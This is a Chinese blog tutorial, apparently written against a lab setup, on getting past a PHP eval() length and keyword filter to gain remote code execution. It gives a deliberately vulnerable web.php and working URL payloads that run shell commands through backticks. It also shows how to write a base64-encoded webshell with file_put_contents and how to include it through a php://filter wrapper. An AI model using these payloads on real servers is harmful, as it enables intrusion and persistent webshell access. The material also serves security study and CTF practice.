RCE的奇技淫巧(EVAL长度限制突破技巧)

已于 2024-08-13 23:19:23 修改
阅读量790 收藏 5
点赞数 7
分类专栏: 安全 文章标签: 网络 服务器 网络安全 安全 网络协议 web安全 计算机网络
于 2024-08-13 17:13:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67441173/article/details/141141272
版权

目录

一、EVAL长度限制突破技巧

1、简单绕过技巧:(`$_GET[1]`)

1.1首先我们先创建一个web.php文件

1.2利用`$_GET[1]`拿到webshell

2、文件包含利用

2.1利用$_GET[1]写入文件

2.2文件包含方式执行文件

2.3将页面执行出来的base64编码进行解码就是一个一句话木马

3、利用usort(...$_GET)技巧突破限制;

3.1抓包

3.2将内容发送过去发现出现错误,这里是因为我是php7.3.4的版本,这个漏洞已经被修复了所以看不到效果,将版本更换为php5.6即可

一、EVAL长度限制突破技巧

1、简单绕过技巧:(`$_GET[1]`)

1.1首先我们先创建一个web.php文件

<?php
$param = $_REQUEST['param']; If (
strlen($param) < 17 && stripos($param, 'eval') === false && stripos($param, 'assert') === false
) {
eval($param);
}

这里的意思是,对只要出现eval和assert这两个函数进行限制,对长度限制是要小于7

这里的param就是接收的参数,那么我们就可以在网页上进行绕过限制得到我们想要的页面,例如我们运行phpinfo的页面

192.168.171.136/web.php?param=phpinfo();

1.2利用`$_GET[1]`拿到webshell

编写语句

web.php?param=echo `$_GET[1]`;&1=id;,这里``就是将命令执行转换为了代码执行

注释:这里&后的1等于的是id

这里必须注意要在&前面添加分号,ascii必须要echo才能输出内容

2、文件包含利用

2.1利用$_GET[1]写入文件

注释:file_put_contents&param=$_GET[1](N,P,8)

param传的参数是$_GET[1],$_GET[1]相当于写的是file_put_contents;1接收的参数是N,P,8,N是要写入的文件名,P是一句话木马的base64的编码也就是我们要写入文件里的具体参数,8是追加参数

转换成base64是因为有些字符不能追加,比如^,

执行后就可以看到Linux 文件目录下多了一个文件N里面也追加成功了内容

2.2文件包含方式执行文件

param=include$_GET[1];&1=php://filter/read=convert.b ase64-decode/resource=N

include就是包含的意思,这里的文件包含就是把接收到所有文件当作是php文件来执行

2.3将页面执行出来的base64编码进行解码就是一个一句话木马

3、利用usort(...$_GET)技巧突破限制;

php、JS中可变长参数表示:...

3.1抓包

3.2将内容发送过去发现出现错误,这里是因为我是php7.3.4的版本,这个漏洞已经被修复了所以看不到效果,将版本更换为php5.6即可

Hhmy
关注
专栏目录
[渗透测试笔记] 07.代码执行
H4ppyD0g的博客
08-29 734
eval <?php eval("echo 1;"); ?> 输出1 <?php eval("echo 1"); ?> 语法错误 <?php eval(echo 1;); ?> 语法错误 <?php eval(echo 1); ?> 语法错误 <?php eval(phpinfo()); ?> 正常显示 <?php eval(phpinfo();); ?> 语法错误 <?php
WEB安全渗透测试》(30)RCE漏洞挖掘技巧
午夜安全
09-14 1609
我们安全工程师最喜欢的漏洞是什么?非RCE漏洞莫属!那RCE漏洞挖掘是否有技巧可言?
eval & exec(绕过长度限制思路学习)
weixin_34004576的博客
02-07 529
eval & exec知识记录--原文章phithon,只是记录一下我自己的学习过程。 1、eval & exec if(strlen($param)<17 && stripos($param,'eval') === false && stripos($param,'assert') === false) { //ech...
RCE奇技淫巧:1、参数值长度限制2、长度限制+不能有字母数字
代码其实很简单
08-11 540
RCE奇技淫巧:1、参数值长度限制2、长度限制+不能有字母数字;001、用多个参数来实现分段写当我们的url中id参数长度被被限制了,那么我们可以采用将需要执行的代码进行分开再合拢后端:eval($_get[id]) ,id长度限制前端:?id=echo `$_get[1]`&1=whoami注意千万不能这样写:?id=`$_get[1]`&1=echo whoami
RCE下的一些奇技淫巧
丁航航的博客
08-12 282
usort就是将传入的两个参数,第一个是一个数组,第二个是一个回调函数,然后将数组的值挨个向回调函数里放。那我们就想能不能通过一些方式,将文件名排列组合拼接在一起形成一句话木马?上面这段代码的意思是传递的参数要小于17位,并且不能存在eval和assert。PHP Eval函数参数限制在16个字符的情况下,如何拿到Webshell?因为使用file_put_contents时,有些字符不能使用,例如0这样是创建一个文件名为0的文件。语句中的8是什么意思?
CTFHub-Web-RCE-eval执行题目解析
weixin_46168073的博客
11-15 1367
一、启动场景 web RCE eval执行。 开启题目,启动场景。注册会送1000个币,做一个题目消耗30,做完奖励100还是50,总之完全不用担心币的问题。 启动之后会出现一个链接,我们击。 二、解题过程 这里会出现PHP代码。 我们使用蚁剑 。(安装之类的我会单独写一篇文章) 右键--->添加数据。 把URL复制到蚁剑,密码cmd 然后击添加。 可以看到我们添加数据成功。 双击进...
RuijieRCE:锐捷锐捷网络RCE突破检测工具,可批量检测
03-06
瑞杰网络RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。 免责声明 由于传播,利用此文所提供的信息而造成...
Parse error: syntax error, unexpected end of file in D:\phpStudy\WWW\pikachu-master\vul\rce\rce_eval.php(19) : eval()'d code on line 1
08-21
这个错误是由于在D:\phpStudy\WWW\pikachu-master\vul\rce\rce_eval.php文件的第19行引起的eval()函数调用后的语法错误。 根据提供的引用内容,这个错误信息是一个PHP解析错误,意味着在代码中有一个语法错误,导致...
锐捷rce复现漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-16 1092
​锐捷 rce复现,请求路径/guest_auth/guestIsUp.php //锐捷rce复现漏洞 锐捷rce漏洞文件
4.网络编程
weixin_45476535的博客
09-14 488
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
Java-网络
2301_81543552的博客
09-14 693
Java中的网络编程主要涉及使用Socket类进行网络通信,以及理解各种网络协议。以下是一些关键概念和示例代码,帮助您入门。
使用堡垒机登录ftp服务报网络不可达错误
ajax_beijing_java的博客
09-14 202
解决方法:由于不想安装额外的服务在服务器上,于是想到使用sftp服务代替ftp服务,发现是可以使用的。22端口默认就是启动的,在堡垒机上加了sftp服务,再次连接服务器并使用filezila传输文件 ,文件可以正常传输。至此,问题得到解决。场景:开发同事想使用ftp传输服务,连接服务器时报网络不可达错误。排查发现,如果想使用ftp服务,需要在服务器上部署ftp服务,21端口才会存在,才可以访问该服务。
WireShark分析localhost包
ngczx的博客
09-11 708
WireShark分析localhost包
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-11 954
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
计算机网络 - 基础问题】每日 3 题(七)
最新发布
Newin2020的博客
09-16 896
✍个人博客:Pandaconda-CSDN博客📣专栏地址:http://t.csdnimg.cn/fYaBd📚专栏简介:在这个专栏中,我将会分享 C++ 面试中常见的面试题给大家~📝推荐参考地址:https://www.xiaolincoding.com/(这个大佬的专栏非常有用!
iptables实现内外网ip转换
m0_67475830的博客
09-13 495
准备三台虚拟机。
哪些行业需要办理网络文化经营许可证?
众森企服
09-13 1010
本规定所称互联网文化产品是指通过互联网生产、传播和流通的文化产品,主要包括: (一)专门为互联网而生产的网络音乐娱乐、网络游戏、网络演出剧(节)目、网络表演、网络艺术品、网络动漫等互联网文化产品;网络表演指以网络表演者个人现场进行的文艺表演活动等为主要内容,通过互联网、移动通讯网、移动互联网等信息网络,实时传播或者以音视频形式上载传播而现场的互联网文化产品,电商类、教育类、医疗类、培训类、金融类、旅游类、美食类、体育类、聊天类等直播不属于网络表演。1️⃣音乐娱乐产品(音乐网站、手机音乐网站、APP音乐)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值